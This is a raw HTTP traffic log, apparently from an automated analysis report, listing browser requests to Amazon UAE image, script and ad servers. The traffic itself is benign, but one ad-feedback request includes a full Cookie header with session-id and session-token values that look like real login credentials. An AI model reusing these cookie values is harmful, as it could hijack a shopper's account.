    Source: global trafficHTTP traffic detected: GET /images/I/81yOsv2Uv5L._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/sash/McBZv0ZvnbehkIx.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Search_auto-bottom-advertising-0_portal-batch-fast-btf-loom_placement%22%2C%22pageType%22%3A%22Search%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlL3MvP19lbmNvZGluZz1VVEY4Jms9dG95cyZjcmlkPTMzRFk4Q1JUS0UwSlcmc3ByZWZpeD10b3klMkNhcHMlMkMyMDQmcmVmPW5iX3NiX25vc3NfMSZwZF9yZF93PXZkS0o3JmNvbnRlbnQtaWQ9YW16bjEuc3ltLjBlMmMzZWViLTBiODktNGY4ZC05NDcwLWJhNTI0MGY3MjkyNiZwZl9yZF9wPTBlMmMzZWViLTBiODktNGY4ZC05NDcwLWJhNTI0MGY3MjkyNiZwZl9yZF9yPUFQQVZDUUpNRks3OFFKRVYxUE1aJnBkX3JkX3dnPXZUaHltJnBkX3JkX3I9ZWI4Mzc5MzItNDhkMC00ZDM1LWI3NDMtYTZiZjYyZjVhODg2JnJlZl89cGRfaHBfZF9hdGZfdW5r%22%2C%22slotName%22%3A%22auto-bottom-advertising-0%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221027%22%2C%22adCreativeId%22%3A%220%22%2C%22adId%22%3A%22300164802756332%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1Host: www.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011; session-token=iEWMYEFKrtJIow/CNVuOz9FUzjcviv4X0ndqos/Z/EndZGMUPIqV/cGu0xyhHpymMzemV8FzzfcoPADcJtxlyqX92z9iptXKr7Ms1mulHo/qBujYJmsju/RRcnb/s2XPz1nDckf2AVkM7phlRS6PK0A8Oyz8zrBSfywK4K42pHS6LfHMBPPWnR7dE/8YgkCddjRb8f8+hproby/VGgI8K8LnWJVX3JXL79eqf88m0ziYgOsvjw8MkYnWie0RnY4FwNp1tJATQeWJi10aPKwLq+9IR2ER+0budc5NnOCUOKiuDhl6E9x/w1jDuk96dSs86r5dxrWNLvn3N15ReTLbBABXtREiOpP9; csm-hit=tb:s-RP6015S40NY7Z1AX6ZEM|1724264932059&t:1724264933928&adb:adblk_no
    Source: global trafficHTTP traffic detected: GET /images/I/51f62XpPM+L._AC_SR250,250_QL65_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61714TRvg4L._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/711nRqFo6GL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/01/AUIClients/AmazonUIFont-amazonember_bd-46b91bda68161c14e554a779643ef4957431987b._V2_.woff2 HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://images-eu.ssl-images-amazon.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81BY-cAOlCL._AC_QL10_SX728_SY90_FMwebp_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81BY-cAOlCL._AC_QL95_SX728_SY90_FMwebp_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/01/AUIClients/AmazonUIFont-amazonember_rg-cc7ebaa05a2cd3b02c0929ac0475a44ab30b7efa._V2_.woff2 HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://images-eu.ssl-images-amazon.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/perc/prime-logo.svg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61aTQubT0LL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41zL88vnT5L.js HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://images-eu.ssl-images-amazon.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/91rNDaUuWZL.js HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://images-eu.ssl-images-amazon.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61lJoq-YDAL.js?xcp HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/al-eu-726f4d26-7fdb/7c0c795f-4611-4e55-9ae6-d19245573000._CR0,0,600,100_AC_QL95_SX728_SY90_FMwebp_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/VAS_MENA/2024/GW/QC/Furniture/XCM_CUTTLE_ORIGIN_1707658_3701318_186x116_1X_en_AE_Version_3._SY116_CB561430975_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/al-eu-726f4d26-7fdb/7c0c795f-4611-4e55-9ae6-d19245573000._CR0,0,600,100_AC_QL10_SX728_SY90_FMwebp_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/11XMgK3X1EL._RC%7C31PLWBroQRL.js,31Y5AkqmNvL.js,01WtpFkF58L.js,313k3X0MlqL.js,41STYmgYJcL.js,41E7GR6uegL.js,01r1r3sVlxL.js,21A1FsWcl5L.js,019dBqWurRL.js,11begzhl8OL.js,011VrMJVPzL.js,01XQQDMWkKL.js,012z3lMdhOL.js,11Exu1nsH7L.js,01b82LFIRTL.js,11UyW+59ZyL.js,015CwW0puPL.js,21UoUtkStoL.js,0164lSJukTL.js,219jZMsEOWL.js,01X+UeeJIKL.js,31ydWb2R4oL.js,01FA0ZefFJL.js,41sLQbGE0jL.js_.js?AUIClients/SearchAssets&4qcBlqbu HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51GRfnCRJBL._RC%7C01B3Yme5dLL.js,01j5DeZSMzL.js,31CuRA-rQfL.js,51M-SaPaAgL.js,01KTtrmeR5L.js,21RoFlDNKHL.js,41fFmJrK7zL.js,01N0G7oHRlL.js,31-hnA-p85L.js,118u4l1lw0L.js,01KVpvQDfZL.js,21XkditqCiL.js,0175nbnAD4L.js,01TF4KwVp5L.js,013F47KhYmL.js,21-qzi7P9VL.js,31qUHWTq-2L.js,21JVz3Jj7-L.js,01gkl49RM3L.js,011Y0pg8goL.js,010atgkqRqL.js,11HK5yarA+L.js,010dZST96oL.js,01UY0Z7k19L.js,215jXa7j8AL.js,51IaANPNPrL.js,31jzxcc0Q6L.js,01ly-sHeg8L.js,318qG8kymWL.js,018v226z-QL.js,21z34K3nOVL.js,31M8YAO7NgL.js,01993rJ5roL.js,01NCaKamrYL.js,011gqdvx+zL.js,01JzRVMDE6L.js,11wZIavy8WL.js,01dfGSDqqiL.js,01v8HNSpzuL.js,01GsEhoWBNL.js,01xShn6mQGL.js,012USBOk43L.js,21ZDIxQB3qL.js,61O+a0St5IL.js_.js?AUIClients/SearchPartnerAssets&dnYRJTGa HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/01/d16g/kpw/transparent-1x1.png HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/717GC0EDl8L._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610033_186x116_1X_en_AE._SY116_CB582137121_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259756_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259749_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259758_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51E89bvF-mL._AC_SR250,250_QL65_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610032_186x116_1X_en_AE._SY116_CB582137121_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /e/xsp/getAd?placementId=a6b228d9-6ecf-4580-a80f-06ec30d01262&src=518&rj=%7B%7D&slot=auto-bottom-advertising-0&rid=0101303bdabc4c01cc6316b4cb39fd37d0ef69e5c99e4e3dad870bf325de8a77398b HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259737_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259751_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259736_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /e/xsp/getAdj?placementId=a41eaf9d-2a3a-4755-9b85-43dc8c32cac2&src=518&rj=%7B%7D&slot=auto-left-advertising-1&rid=0101303bdabc4c01cc6316b4cb39fd37d0ef69e5c99e4e3dad870bf325de8a77398b&callback=aax_xsp_render_ad HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/al-eu-726f4d26-7fdb/d357b1d2-39e5-4349-8019-c0e0644649ee.mp4/r/THUMBNAIL_360P_FRAME_3_CAPTURE_2.JPG HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51qJO2LBrzL._AC_SR250,250_QL65_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71NBFetdoEL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61YPVDIQD7L._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
